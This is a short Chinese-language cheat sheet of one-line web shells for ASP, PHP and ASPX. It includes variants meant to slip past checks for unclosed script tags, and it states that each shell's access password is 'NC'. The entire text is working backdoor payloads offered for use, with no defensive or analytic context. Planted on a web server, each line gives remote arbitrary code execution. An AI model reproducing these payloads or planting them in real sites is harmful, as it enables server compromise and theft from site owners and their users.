可以突破Script 块缺少脚本关闭标记的一句话
asp一句话
<%execute(request(“NC”))%>
"%><%execute(request(“NC”))%><%’
php一句话
<?php eval($_POST[NC]);?>
aspx一句话
<% @Page Language=“Jscript”%><%eval(Request.Item[“NC”],“unsafe”);%>
突破防止闭合一句话:
<%execute request(“NC”)%><%’<% loop <%:%>
以上密码均为:NC